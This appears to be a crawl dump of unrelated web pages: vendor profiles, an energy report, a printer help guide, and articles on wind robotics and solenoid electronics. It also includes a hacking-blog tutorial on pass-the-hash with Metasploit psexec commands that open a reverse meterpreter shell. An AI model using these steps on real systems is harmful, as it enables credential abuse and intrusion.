GEIS was founded in the mid-eighties to support mainframe and manufacturing-based systems. Later, the company changed its focus to the burgeoning geospatial industry segment. Since then, the company has been working on GE's Smallworld product suite - a GIS with a market-proven portfolio of products that support the full lifecycle for network assets from strategic planning, design, and build to operations support. GEIS is a GE Smallworld partner, and their Mundi solution supports clients in making complete use of their asset data collected from the Smallworld products.
GEIS' solutions are well received by GE customers in the market. As a ready-to-deploy GE Network Viewer extension, GEIS' Mundi delivers an enhanced business solution by complementing and extending the feature set. The solution is highly configurable and enables clients to turn features on and off to simplify the view for end-users. Mundi's query tool supports nuanced queries for users. Clients can also make use of the measurer tool for segment length and angle information to project directions and distance in their GIS projects. Mundi provides a fully-functioning Explorer tool that supports a wide range of formats. The tool also offers the ability to assemble a client's collection of records, which may then be used as the input to a Thematics operation or sent to a third-party system. It provides a sophisticated Thematics engine that enables on-the-fly styling of the map data by an arbitrary combination of filters. In addition, Mundi offers a sophisticated layer control system that supports preset visibilities, grouping, mutual exclusion of layers, and opacity. Here, layers can be interlinked and presented in a variety of styles as the underlying data dictates, including radio buttons and dropdowns. What's more, Mundi includes support and tracing for physical network inventory (PNI). Mundi is currently deployed in three countries, both in the utility and local government sectors. In addition to in-house use, Mundi is used as the public-facing web mapping portal, and also deployed in the field for use as a mobile solution.

GEIS offers a PNI-based product, Pathfinder, that finds paths between two structures in a fiber network. Pathfinder identifies areas of fiber splicing to complete a path through the network and can automatically perform the necessary splices to create a complete end-to-end fiber path. The solution can output a splice report detailing the network changes, displaying multiple fiber paths between two structures. Clients can view business information such as fiber owners, leases, and current usage types about the paths to make informed splicing decisions. The solution supports both cable connectivity and graphical splice diagrams and automatically orthogonalizes new connections in splice diagrams to ensure tidiness.

The 'No Surprises' Agenda
"We believe that clients need a solution that is suited to their current and future needs. Our team has acquired experience across the utility and telecommunication space that gives us a greater level of subject matter expertise than being 'pure' GIS specialists," says Cosgrove. The GEIS team goes the extra mile for its clients by guaranteeing 'No Surprises' in all of their services. Cosgrove emphasizes, "The key to delivering to the 'No Surprises' principle is to have sound knowledge of the business drivers, objectives, and processes. This leads to the right solution for the client, and not just a technical solution. The payback is once a project commences, our insight ensures that an optimum outcome is achieved within the agreed timeframe."

Having worked closely with clients in the utility and telecommunication industry for decades, the GEIS team has acquired a sound, practical understanding of its complex challenges. "Our team believes technology only reaches its full potential when it is driven by an intuitive understanding of the business it serves," says Cosgrove. The team identifies client requirements and suggests suitable products for them depending on where they are in their development and product maturity cycles.
Most often, the company uses cloud-based tools to assist in the collaboration and to enable clear and concise communication externally and internally, which is essential for successful outcomes. Further, GEIS takes a flexible and agile approach to deliver solutions while complying with regulations and providing higher returns. "We aim to make sure that the appropriate solution is covered in the initial implementation," adds Cosgrove. The client services team is available anytime, providing front-line support capable of guiding customers, overseeing implementation, and delivering training services. Altogether, the company proactively serves and supports its customers, essentially reducing their concerns and allowing them to remain focused on other areas. "System integrations tend to be both complex and critical to our client's BAU processes. Several of our clients have effectively outsourced day-to-day support to GEIS, giving them confidence that issues arising with business-critical processes will be addressed in a timely manner by highly expert personnel," remarks Cosgrove.

For over a decade now, GEIS has assisted numerous clients on the geospatial front. The company has worked with GE in the globalization of its GE Electric Office product. This led to GEIS being subcontracted to undertake the first Electric Office 4.3 implementation worldwide. Similarly, GEIS has developed interfaces to a number of advanced distribution management systems (ADMS). In addition, GEIS has helped telecommunications clients by supporting integration activities between OSS and BSS systems to expose GIS data more widely to operational and business functions. GEIS will continue to enable its customers to make informed and practical decisions in combination with their wide range of the latest geospatial solutions. "We want to continue to be one of the preeminent geospatial technical solution providers and integrators. We are committed to assisting companies in exposing their spatial and location resources to a wider enterprise audience, which will provide considerable additional value using web mapping tools without the need for data migration," concludes Cosgrove.
systems_science
https://ohiorivervalleyinstitute.org/a-clean-energy-pathway-for-southwestern-pennsylvania/
2023-12-05T08:55:56
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100550.40/warc/CC-MAIN-20231205073336-20231205103336-00857.warc.gz
0.931443
1,924
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__131939492
en
This report describes the development and analysis of a clean energy pathway for a 10-county region in southwestern Pennsylvania. Due to its abundance of fossil fuel resources, the region has a long history of substantial energy production, often at the expense of local environmental quality and economic diversity. A transition to clean energy provides a compelling opportunity to transform the local energy profile, while ending the region's overreliance on fossil fuels, to reduce emissions and pursue a path of sustainable growth. To date, the prevailing narrative for decarbonizing this region has centered around the perpetuation of the natural gas industry and costly investments in carbon capture and storage (CCS) technologies and infrastructure. Strategen's analysis provides an alternative focused primarily on zero emissions resources, energy efficiency, increased electrification, and leveraging clean energy imports from outside the region, while minimizing the local need for fossil fuels.

Key Takeaways from this study:
- A renewables-based pathway, including energy efficiency and clean energy imports from the PJM market, is more cost-effective than continued reliance on fossil fuels. A strategy focused on natural gas and carbon capture will be 13% more costly than the clean energy pathway, which avoids expensive investments in CCS technologies to reduce emissions, while limiting the region's exposure to fuel price volatility and mitigating the risk of stranded fossil fuel assets.
- In the developed decarbonization pathway, all coal plants and a significant portion of natural gas plants in the region will retire or reduce output by 2035, drastically reducing emissions going forward. A limited portion of natural gas plants may be kept online as capacity or peaking resources and to ensure reliability, though clean dispatchable resources could potentially serve this role in the future, as technology progresses.
- The clean energy pathway results in a 97% reduction in CO₂ emissions from the power sector by 2050, leading to environmental benefits of nearly $2.7 billion annually. These benefits are greater than those associated with strategies built around natural gas and CCS, furthering the case for the clean energy pathway as a least-cost option for energy transition.
- Deep electrification of the transportation and buildings sectors can directly lower regional CO₂ emissions from these sectors by 95%. The total annual value of environmental and health benefits associated with combined reductions from the power, buildings, and transportation sectors reaches $4.2 billion in 2050, through avoided social costs.
- Through reduced reliance on natural gas for power generation and in buildings, Strategen's decarbonization pathway will decrease natural gas consumption by 96% and 98%, respectively, for these two sectors by 2050. Lower consumption provides an opportunity to reduce emissions associated with natural gas extraction. The value of these avoided emissions would surpass $1 billion in 2050 alone.
- Energy efficiency is projected to increase over time, reducing regional electricity load by an average of 2.6% each year of the study period. Combined with electrification, the clean energy pathway results in overall load growth of 33% by 2050.
- Efficiency measures not only reduce load, emissions, and the need for additional generation, but also lead to local job creation and savings for consumers.
Expenditures on efficiency and resulting residential bill savings support 12,416 total jobs in 2035, and 15,353 total jobs by 2050. Compared to both power generation and fossil fuel extraction, energy efficiency has a greater potential for local economic development, leading to more, higher-paying jobs served by workers and suppliers within the region. Focusing on the power sector as the backbone of the region’s clean energy transition, Strategen conducted analysis to develop a clean, reliable, and cost-effective resource mix for meeting electricity demand, in a manner more consistent with efforts to limit global warming potential to 1.5° Celsius by 2050. The clean energy analysis additionally included deep electrification to transition nearly all fuel usage from the buildings and transportation sectors to further reduce emissions as the power sector decarbonizes over time. Through the use of an in-house dispatch model, Strategen employed data on localized hourly demand, the potential for renewable energy and energy efficiency improvements, import transmission capacity, and cost forecasts to simulate the operation of the electric grid and determine the necessary resource mix for the region, with limited contributions from fossil generation to ensure reliability. Strategen’s analysis found that harnessing the local potential for renewable energy in the region and importing clean energy from the PJM interconnection allows for the retirement of all coal resources by 2035 and nearly all natural gas generation by 2050. For balancing and reliability, there is a need for some natural gas or other dispatchable resources to remain on the system, but even these resources have the potential for future decarbonization through possible advancements in technology. Over time, the region transitions from a net exporter of electricity to a net importer, through the ability to leverage cleaner resources from areas rich in renewable potential via the regional PJM energy market. By 2050, approximately 31% of the energy supply is expected to come from outside of the region. At the same time, electrification, net of increased energy efficiency, results in a 33% growth in load, with the majority met by zero emissions resources, including wind, solar, hydroelectric and nuclear power. Of these resources, solar and wind would experience the largest expansion, increasing demand for land and workers locally and within the PJM region. Strategen’s clean energy pathway for the region is actually lower cost than a pathway that relies on natural gas resources with carbon capture. For this comparison, an alternative scenario was developed, assuming that generation must be local to the region and that natural gas resources were not retired, paired with CCS technology instead. Overall, the clean energy pathway for the power sector is 13% less expensive than a pathway relying on gas and CCS. The clean energy pathway reduces emissions drastically, cutting CO₂ emissions by 92% by 2035 and 97% by 2050. The reductions result in environmental and health benefits of more than $2 billion in 2035, reaching $2.7 billion annually by 2050. These environmental benefits are greater than those associated with the alternative case built around natural gas and CCS, further underscoring the finding that a clean energy transition minimizing the use of fossil fuels would be the least cost pathway for southwestern Pennsylvania. 
Through electrification, the clean energy pathway additionally reduces CO₂ emissions from the buildings and transportation sectors by 46% in 2035 and 95% by 2050, resulting in annual environmental and health benefits valued at $572 million and $1.5 billion in 2035 and 2050, respectively. In total, reductions in CO₂ from the power, buildings, and transportation sectors lead to annual benefits of $4.2 billion in 2050, through avoided social costs. Furthermore, the developed clean energy pathway reduces the region’s reliance on natural gas for power generation and in buildings, resulting in decreases in overall consumption of natural gas from these two sectors of 96% and 98%, respectively, by 2050. This drop in demand, which reaches 500 billion cubic feet annually by the end of the study period, provides the potential opportunity to lower emissions from natural gas extraction. Treated as a corresponding decrease in natural gas production in the region, the value of these avoided emissions and associated damages totals more than $1 billion in 2050. From an economic development perspective, Strategen’s proposed decarbonization pathway offers further advantages for the local economy. Energy efficiency improvements provide a particularly strong opportunity, as the region transitions away from fossil fuels, generating economic activity in labor-intensive sectors and leading to job creation in industries served by the local workforce. Strategen conducted analysis to explicitly estimate the job creation potential from energy efficiency improvements included in the clean energy pathway for the region, using local multipliers from the U.S. Bureau of Economic Analysis, finding that expenditures on efficiency and resulting residential bill savings support 12,416 total jobs in 2035, and 15,353 total jobs by 2050. Energy efficiency provides tremendous value not only as a cost-effective alternative to utility scale generation, but also as a compelling driver for local economic development. Compared to electric power generation and fossil fuel extraction, energy efficiency has greater potential for local, sustainable growth. Analysis of multiplier data for the 10-county region shows that efficiency investments create more jobs than these industries, and that the jobs created offer higher wages. Moreover, most efficiency improvements, such as upgrades in lighting, insulation, doors and windows, or heating and cooling systems, can be performed by local workforce, supporting jobs for contractors and suppliers within the region. This is especially true for rural or exurban areas. In contrast, industries such as natural gas extraction have often relied heavily on workers and suppliers from out of state. Energy efficiency therefore offers a particularly attractive option for a region where job growth and personal income have significantly trailed national growth rates since the beginning of the natural gas boom. Southwestern Pennsylvania carries a disproportionate socio-economic and environmental burden from the energy industry, but a power sector decarbonization pathway for southwestern Pennsylvania that leverages clean energy imports from the PJM market and is focused on renewable energy, existing nuclear, energy storage, and energy efficiency has the potential to transform the region and shift away from its reliance on fossil fuels. 
The clean energy pathway designed by Strategen results in cost savings, emissions reductions, and local economic development, laying the groundwork for sustainable prosperity in the 10-county region.
systems_science
https://trueimagetech.com/blogs/all/how-to-find-brother-printer-ip-address
2024-02-25T21:18:02
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474643.29/warc/CC-MAIN-20240225203035-20240225233035-00542.warc.gz
0.888674
1,612
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__62643739
en
Brother Printer is a well-known printer brand widely acclaimed for its high quality, performance, and reliability. This brand offers a variety of printer models suitable for various application scenarios, such as homes, small offices, and large enterprises. An IP address is also very important for a printer: it matters for network connection, remote printing, printer settings and management, and network security. This blog explains what an IP address is and how to find a Brother printer's IP address, and we hope it is helpful to readers.

What Is The IP Address Of A Printer?
The printer IP address is the address used to uniquely identify the printer in the network, similar to the IP address of a computer. The printer IP address consists of four numbers, each between 0 and 255, separated by dots. These numbers can be divided into two parts: one identifies the network, and the other identifies the individual device connected to that network. The printer IP address is unique in the network and is used to find and connect to specific printers on the network. The printer IP address can be configured manually or automatically. When configuring the printer IP address, it is necessary to follow certain steps to ensure the printer can be correctly connected to the network and used normally. Many Brother printers have wireless capabilities, allowing you to connect multiple devices without setting the printer to run on a specific network. In most cases, you only need to connect the printer to a Wi-Fi network.

How To Find The IP Address Of A Brother Printer?
You can use the following four methods to find the IP addresses of Brother printers:

Menu On Printer Panel: Most Brother printers have menu buttons. Taking the Brother MFC-L2820DW printer as an example, you can select the "Settings" or "Menu" options on the printer's control panel. Use the arrow keys to navigate the "Network" or "Network Settings" menu. Search for the "TCP/IP" or "IP address" options in the network settings menu. After selecting this option, you should be able to see the printer's IP address. This method also works for finding the IP address of your Brother MFC-L3710CW printer.

Printer Configuration Page: Some Brother printers allow you to find the IP address by printing the configuration page. You can find instructions on printing this page on the printer panel. Taking the Brother HL-L6210DW printer as an example, first, ensure that the printer is turned on and the paper is loaded. Next, press the up or down icon to select the [Print Report] option, then press OK. Then press the up or down icon to select [Network Configuration]. Finally, press OK and Go. Usually, this page provides detailed information about printer network settings, including IP addresses. This method also works for finding the IP address of your Brother HL-L3210CW, HL-L3230CDW, HL-L3290CDW printers.

Using Brother Printer Software: If you have installed the relevant software for Brother printers, you can open the software on your computer and look for options related to printer connection. Usually, the software will display the IP address of the printer.

On Windows:
1. Navigate from the Windows Start menu to the Control Panel after connecting the printer via USB.
2. In the "Hardware and Sound" area, proceed to click "View devices and printers".
3. Locate your printer under "Printers and Faxes," and make sure the right printer is chosen by examining the printer's model name and number.
4. Right-click the printer icon and then choose "Properties" from the menu.
5. In the properties menu, select the "General" tab and look for the "Location" field. The values on the right side of this field correspond to the printer's IP address.

On a Mac:
1. Click on "System Preferences" on the Mac main screen.
2. Click to open a new window. Then, search for and click on the "Print and Fax" option in the new window.
3. Locate your printer in the "Printers" tab and verify that you have chosen the correct printer by checking the model and name.
4. After selecting the right printer, select "Options and Consumables". The printer's IP address will appear on the new screen.

Router Management Page: If you know the router that connects to the printer, you can log in to the router's management page. On the router management page, search for the list of connected devices or DHCP clients, and you should be able to find the printer's IP address.

Record these numbers accurately, no matter which operating system you use to find the printer's IP address. Then, you can use these numbers to configure the printer to run on a dedicated network or to help diagnose future connection issues. However, it is worth noting that the specific steps may vary depending on the printer model. If you have a user manual for the printer, it is recommended to consult the manual for detailed guidance. Alternatively, search for relevant information online or contact Brother Printer Support for more assistance.

Frequently Asked Questions About Finding Brother Printer IP Address

Brother Printer Cannot Connect To The Network?
Check Connection: Ensure that the printer and router are properly connected. Check that the printer is linked to the appropriate wireless network.
Restart: Try restarting the printer and router. Sometimes, restarting can solve connection problems.
Network Settings: Ensure your printer is correctly configured with wireless network settings. You might need to provide the correct network password.
Update Driver: Check if the driver for your printer is the latest version. You can download and install the latest drivers on the printer manufacturer's website.
Firewalls And Security Software: Check your computer's firewall and security software settings to ensure they do not block printer and network communication.
Reset Network Settings: Some printers have a network settings reset option. You can reset it to the default settings and reconfigure the network connection.
If you have tried the above methods but still cannot solve the problem, it is recommended to consult your printer's user manual or visit the manufacturer's support website for more detailed assistance.

Brother Printer Cannot Enter The Settings Interface?
1. Incorrect Gateway Address Configuration: Please verify that the new address entered is valid. You can check to see if input mistakes occurred when modifying the settings.
2. Network Configuration Issue: If the gateway address is changed but the settings interface cannot be reached, the printer's present network configuration may be incompatible with the new gateway address. You can reconnect the printer to the network and verify that it can receive an IP address appropriately.
3. Firewall Or Router Settings: Sometimes, firewall or router settings prevent access to the printer's settings interface. Turn off the firewall or verify the router settings to ensure printer access.
If none of the above methods can solve the problem, it is recommended to contact Brother printer customer support for assistance. Finding the IP address of your Brother printer can help you better manage and use the printer and improve work efficiency. We hope this blog helps you find the IP address of your Brother printer smoothly. If you have any questions or need further assistance, please get in touch with our True Image technical support team anytime. In addition, True Image offers affordable Brother compatible toner cartridges, such as our Brother TN830 and Brother TN920 monochrome-compatible toner cartridges, as well as our Brother TN-227 and Brother TN229 color-compatible toner cartridges, which have the same quality and performance as the original Brother toner cartridges. They can provide you with excellent printing quality while saving you costs. If needed, True Image is a good choice.
systems_science
http://capamanager.blogspot.com/2012/12/kaizen-software-capa-8d-download.html
2013-06-18T21:38:14
s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368707188217/warc/CC-MAIN-20130516122628-00080-ip-10-60-113-184.ec2.internal.warc.gz
0.905082
237
CC-MAIN-2013-20
webtext-fineweb__CC-MAIN-2013-20__0__63562334
en
Kaizen software manages improvement activity in your business
CAPA Manager Kaizen software automates the routing, notification, delivery, escalation and approval of Kaizen projects within your business and supply chain. It automates the management of the entire improvement process, from initiation to investigation and all the way through to closure. The CAPA Manager improvement software links teams and groups regardless of their geographical location. For example, the identification of an improvement opportunity will trigger a process which will allow remote stakeholders to work together on a Kaizen task, enabling the required improvements to be implemented quickly and efficiently.

Measure improvement activity
The system tracks a diverse range of improvement opportunities, such as customer complaints, audit actions, cost-down opportunities, quality issues and more. CAPA Manager Kaizen software also provides a graphical reporting capability which allows improvement momentum to be measured. Through reports, managers get a real-time view of the CAPA process and can be more proactive about improving their quality system. Download your CAPA database in CSV format for analysis in Minitab, MS Excel and more. Using the CAPA data you can build a smart picture of who is improving and who is not.
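As a sketch of the kind of analysis such a CSV export enables, the short C++ program below tallies CAPA records per owner. The file name ("capa_export.csv") and the column layout (record ID first, owner second) are assumptions for illustration only and should be adjusted to match the actual export; the parsing is deliberately naive and does not handle quoted fields that contain commas.

    #include <fstream>
    #include <iostream>
    #include <map>
    #include <sstream>
    #include <string>

    int main() {
        std::ifstream file("capa_export.csv");      // assumed export file name
        std::map<std::string, int> countByOwner;    // owner -> number of CAPA records
        std::string line;
        bool header = true;
        while (std::getline(file, line)) {
            if (header) { header = false; continue; }  // skip the header row
            std::stringstream row(line);
            std::string id, owner;
            std::getline(row, id, ',');             // assumed column 1: CAPA id
            std::getline(row, owner, ',');          // assumed column 2: owner
            if (!owner.empty()) ++countByOwner[owner];
        }
        for (const auto& entry : countByOwner) {
            std::cout << entry.first << ": " << entry.second << " CAPA records\n";
        }
        return 0;
    }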
systems_science
https://idic.org.il/opportunities/searching-for-nl-public-and-private-organisations-to-attend-ai-week-in-israel-17-21-nov-2019
2021-11-30T15:46:14
s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964359037.96/warc/CC-MAIN-20211130141247-20211130171247-00246.warc.gz
0.926264
340
CC-MAIN-2021-49
webtext-fineweb__CC-MAIN-2021-49__0__77530952
en
#51 searching for NL Artificial Intelligence public and private organisations to attend AI week in Israel 17-21 Nov 2019
- Location: Tel Aviv
- Industry: High-tech systems and materials
- Online since: 2019-11-17

The Israeli-Dutch Innovation Center (IDIC) at the Netherlands embassy in Israel is organising a Dutch delegation to take part in the AI week in Tel Aviv. We are looking for Dutch public and private organisations that are interested in participating in the mission. Please also note the conference's open "Call for proposals" on the website.

Join the AI Week this November for a 4-day international event with the experts who are reshaping AI innovation. Bringing together 2,000 technologists and featuring over 100 talks, this event is not to be missed. Combining technological leadership, applied AI and academic research, AI Week will highlight the ways in which AI technology is revolutionizing business strategy, policy and future development. Targeting data scientists, data engineers, AI product managers, as well as startups, investors, and policy makers, our conference focuses on every application of AI technology in real-world domains. Including 4 days with 12 tracks and 10 workshops delivered by industry professionals and researchers, AI Week will delve into every domain, including: Computer Vision, Natural Language Processing (NLP), AI Systems, Agriculture, Healthcare, AI Research, Reinforcement Learning, AI Hardware, Automotive, Industrial AI, Cyber, AI in the Enterprise, and AI 101. AI Week is hosted by The Yuval Ne'eman Workshop for Science, Technology and Security and the Blavatnik Interdisciplinary Cyber Research Center at Tel Aviv University, together with Intel.
systems_science
https://arthelius.com/offshore-wind-farms-are-advancing-at-full-speed-with-the-help-of-drones-and-submarines/
2023-03-27T00:04:18
s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296946584.94/warc/CC-MAIN-20230326235016-20230327025016-00187.warc.gz
0.947224
1,271
CC-MAIN-2023-14
webtext-fineweb__CC-MAIN-2023-14__0__242178310
en
Europe aims to reduce the operating costs of offshore wind turbines.

Off the coast of Portugal, a team of underwater robots inspects the base of a wind farm's turbines for signs of damage, while aerial drones check the condition of the blades. This activity is part of a project to reduce inspection costs, keep wind turbines running longer and ultimately lower the price of electricity. Wind energy accounted for more than a third of electricity generated from renewable sources in the EU in 2020, and offshore wind energy is expected to make an increasing contribution in the coming years. Denmark became home to the world's first offshore wind farm in 1991, and Europe is a world leader in this field. Yet operating wind farms in seas and oceans is expensive and increases the overall cost of this clean energy. In addition, Asian companies are gaining ground in the sector, prompting European industry to maintain a competitive edge.

"Up to 30% of all operating costs are related to inspection and maintenance," says João Marques, from the research association INESC TEC in Portugal. Much of this cost comes from sending maintenance crews on boats to survey and repair offshore wind energy infrastructure. The EU-funded ATLANTIS project is exploring how robots can help with this. The ultimate goal is to reduce the cost of wind energy. Underwater machines, vehicles that move over the water surface and drones are just some of the robots tested. They use a combination of technologies – such as visual and non-visual imaging – and sonar to inspect the infrastructure. For example, infrared imaging can identify cracks in turbine blades. Research conducted by the project suggests that robotics-based technologies could extend the time maintenance vessels can operate on wind farms by approximately 35%.

Cost is not the only consideration. "We also have some safety issues," said Marques, senior researcher on the ATLANTIS project. Transferring people from boats to turbine platforms, diving under waves to inspect docking points, and climbing turbine towers are dangerous tasks. It is not safe to move people from boats to turbine platforms unless the waves are less than 1.5 meters high. By contrast, robotic inspection and maintenance systems can be deployed from boats in waves up to 2 meters high. In addition, simpler and safer maintenance will extend the time that wind farms can be fully operational. In winter it is often impossible to carry out offshore inspections and maintenance, and you have to wait for better weather conditions in spring or summer. "In a month, if there is a problem in a wind farm or in a particular turbine where it is not accessible, operations should be halted until someone can get to it," Marques said. By being able to work in higher waves, the causes of wind farm failures can be tackled more quickly.

The first of its kind
The project's test site is based on a real offshore wind farm in the Atlantic Ocean, 20 kilometers from the city of Viana do Castelo, in northern Portugal. It is the first of its kind in Europe. "We need a place to test these things, a place where people can actually develop their own robotics," he explains. In addition to its own robot technologies, ATLANTIS wants to help other research teams and companies to develop their own systems. European researchers and companies active in this cutting-edge sector should be able to make time to use the facilities from the beginning of this year.
Another way to reduce maintenance costs is to reduce damage and the need for repairs in the first place. The recently completed EU-funded FarmConners project sought to do just that through the widespread use of a technology called wind farm control (WFC). When hit by the wind, the turbines extract energy from the airflow. As a result, the airflow at the back of the turbine has less energy, a phenomenon called shading. Due to this uneven distribution of the energy load on the blades and towers, some turbines sustain more damage than others. WFC aims for a balanced distribution of wind energy across the park, said Tuhfe Göçmen, project coordinator at the Technical University of Denmark.

There are several ways to reduce the effects of shading. One is the misalignment of the turbines. Instead of facing directly into the wind, a turbine can be rotated slightly so that the shadow effect is steered away from the turbines behind it. The pitch and rotational speed of the three turbine blades can also be changed. While this reduces the amount of energy the turbine produces, it frees up more energy for the turbines downstream. In addition to reducing wear and tear and maintenance costs, WFC can make wind farms more productive and help them generate power in a way that is easier to connect to the grid. Renewable energy, including wind energy, is often produced with a series of highs (peaks) and lows. Sometimes peaks or spikes can overload the power grid. By making the turbines work together, the power output can be leveled to provide a more consistent and stable input into the power grid, Göçmen said. "If we jointly control the turbines, everything is more efficient," he said.

Research has shown that such control of wind farms could increase the energy production of all wind farms in the EU by 1%. That's twice as much as a 400-megawatt wind farm, which Gregor Giebel, coordinator of FarmConners at the Technical University of Denmark, said would cost around €1.2 billion to build. This technology is also easy to implement, as most wind turbines can be controlled and adapted to WFC use. Wind farms only need to update their operating software. There is a lot of commercial interest in the WFC technology, making it a promising way for Europe to expand the use of wind energy, says Göçmen. It offers "low cost and high profit potential," he said.

The research in this article was funded by the EU. This article was originally published in Horizon, the EU Journal of Research and Innovation.
systems_science
http://7habitsofhighlyeffectivehackers.blogspot.com/2012/04/passing-hash.html
2024-02-28T05:48:03
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474697.2/warc/CC-MAIN-20240228044414-20240228074414-00533.warc.gz
0.883414
615
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__139220419
en
With Pass-the-hash, a simple un-cracked hash can be used to compromise other systems using the same account.

How it works: Once we gain root access to a system, one of the first things we do is grab password hashes (demonstrated in a previous post), and we typically immediately jump to cracking these hashes. BUT, even an un-cracked hash can be useful. If other systems use the same credentials, we can simply pass the hash along to that system and it will happily accept it and execute code for us.

One method for accomplishing this task is to use the Windows Credential Editor (wce). Written by Hernan Ochoa, it is available from www.ampliasecurity.com/research.html. This tool essentially allows you to edit the memory space of the running LSASS process, replacing your credentials with your victim's username and hash. You can then interact with other systems using any built-in Windows tool (net use, reg, psexec), and you'll effectively impersonate the victim. ***Newer versions of the tool even allow you to use stolen Kerberos tokens (with the -k and -K options).

Now, there is a simpler method for doing a pass-the-hash attack. Since version 3.1, Metasploit has a built-in method for it in the psexec exploit. It is VERY EASY, as I'll demonstrate. We're going to use a hash we've gained from target1 (an old, vulnerable Windows server) to gain access to target2 (Windows XP SP3, fully patched). First, we dump target1 hashes using the hashdump command, and we copy off Administrator's hash. Now we start up msfconsole. The exploit we want is psexec, and for a payload we will use a reverse meterpreter shell, so we issue these commands:

    use windows/smb/psexec
    set PAYLOAD windows/meterpreter/reverse_tcp

We then set the variables for RHOST (target#2's IP) and LHOST (our IP).

    set RHOST "target2 IP"
    set LHOST "Our IP"

Now comes the magic. We set the user and password variables. Metasploit will automatically recognize if a hash is used for SMBPass and will use pass-the-hash rather than a password attempt.

    set SMBUser Administrator
    set SMBPass 73a87bf2afc9ca49b69e407095566351:1c31f...

That's it, run "exploit". As you can see, this set up the reverse handler, connected to port 445 on target2, and using the hash we supplied it was able to execute our payload, giving us a meterpreter shell. Because of one unmanaged legacy system, we were able to thoroughly own a completely patched box.
systems_science
https://www.melodic.cloud/melodic-platform/
2024-02-21T10:28:24
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947473472.21/warc/CC-MAIN-20240221102433-20240221132433-00742.warc.gz
0.915052
510
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__11239001
en
Multicloud management platform – single gate to the multicloud world
MELODIC allows for implementing applications built from various types of components: virtual machines, containers, big data (Apache Spark) platforms and serverless components. MELODIC is integrated with leading cloud service providers: AWS, Azure and Google Cloud Platform, as well as with service providers using OpenStack. Integration with local cloud providers is also being carried out. In addition, unlike Kubernetes, which only allows you to optimize resources within an existing cluster, MELODIC allows you to dynamically add cloud resources as the application needs them, as well as delete them when they are not needed. As a result, the use of resources is tailored to the needs of the application and there is no need to maintain an oversized infrastructure.

Multicloud applications modelling
The key element of the platform is based on the TOSCA standard (Topology and Orchestration Specification for Cloud Applications) and the CAMEL language (Cloud Application Modeling and Execution Language), which allow app requirements and infrastructure to be described independently of a specific supplier, and the most optimal implementation model to be selected depending on the characteristics of the application. An additional element of the platform is the ability to optimize Big Data solutions and data locality awareness. The process of modeling/describing applications in the CAMEL language within the Melodic platform first includes defining its components, the connections between them, and the requirements regarding performance and resources, along with the way of implementing the application. In the next step, the implementation configuration is automatically optimized – the platform "decides" which infrastructure should be used and where.

Cloud computing resources optimization
Initial optimization is made on the basis of parameters specified by the user. Optimization is one of the strongest points of the platform. Advanced methods based on Constraint Programming and Reinforcement Learning (Stochastic Learning Automata) are used to solve the optimization problems. MELODIC also includes a unique module for assessing the usability of a business implementation, based on an adaptive usability function. On the basis of a specific, optimal configuration, a precisely defined infrastructure is automatically created for the selected cloud service providers (virtual machines with set parameters), and then the application is implemented along with the connection settings between components. After implementation, the application is monitored – among others, metrics defining the characteristics of its operation are collected, and these form the basis for automatic optimization of the application implementation based on the current values of the metrics.
systems_science
https://du2017-grp071-14.blogspot.com/2017/04/week-3-updates.html
2019-06-25T17:33:48
s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560627999876.81/warc/CC-MAIN-20190625172832-20190625194832-00213.warc.gz
0.944204
467
CC-MAIN-2019-26
webtext-fineweb__CC-MAIN-2019-26__0__14070183
en
This week, we revised our design and plan for our project. We have decided to go with a bass guitar instead of a lead guitar due to our personal preference, and the fact that we felt it would best fit whatever song the robot orchestra ends up playing. We ordered parts (solenoids, guitar picks, rectifier diodes, 10k resistors, MOSFETs -- a full list of what we used will be published when we finish up with the prototyping phase).

Throughout the testing phase, from when the solenoids arrived in the mail, research has been done to find how solenoids could be controlled from microcontrollers. The main components needed to use solenoids from the Teensy are MOSFETs, rectifier diodes, and 10k resistors. The solenoids require 12V to operate, but a Teensy only outputs 3.3V. The most logical, and most common, way to make use of solenoids with a Teensy is to use a MOSFET. In simple terms, a MOSFET is a switch that allows a current to flow through it when a different current is applied. The two signals do not need to be at the same voltage, meaning the MOSFET can allow a 12V signal to pass through when a 3.3V signal is applied (given there is a 12V power source).

The difference between the operating voltages of the Teensy and the solenoids is so great that there is a risk of shorting something on the Teensy. When solenoids return to the OFF state, the remaining electricity has to go somewhere, and that is what can damage the hardware. The role of a rectifier diode is to keep current running in one direction, so having a rectifier diode prevents reverse flow of current, eliminating that risk. The resistors in our circuit help the signals keep a safe current for our MOSFETs. Resistors reduce current flow and expel that extra energy in the form of heat. The resistors connect the signal wire from the Teensy to the ground rail of the breadboard, which is also connected to the Teensy ground terminal and the 12V ground.
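To illustrate the control side of this setup, here is a minimal Teensy (Arduino-style) C++ sketch for firing one solenoid through the MOSFET described above (assumed to be a logic-level part that switches fully at 3.3V). The pin number and the hold/rest timings are placeholder assumptions rather than values from the actual build, and the rectifier (flyback) diode and 10k resistor are handled in the circuit, not in the code.

    // Drive one solenoid via a MOSFET gate from a Teensy digital pin.
    const int SOLENOID_GATE_PIN = 2;          // assumed pin wired to the MOSFET gate

    void setup() {
      pinMode(SOLENOID_GATE_PIN, OUTPUT);
      digitalWrite(SOLENOID_GATE_PIN, LOW);   // keep the solenoid released at boot
    }

    // Energize the coil just long enough to pluck the string, then release.
    void strikeNote(unsigned int holdMs) {
      digitalWrite(SOLENOID_GATE_PIN, HIGH);  // 3.3V gate signal lets the 12V supply drive the coil
      delay(holdMs);
      digitalWrite(SOLENOID_GATE_PIN, LOW);   // de-energize; the rectifier diode absorbs the kickback
    }

    void loop() {
      strikeNote(30);                         // assumed ~30 ms actuation per strike
      delay(500);                             // half-second rest between test strikes
    }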
systems_science
http://detchem.de/mechanisms/palladium.html
2017-12-16T14:55:04
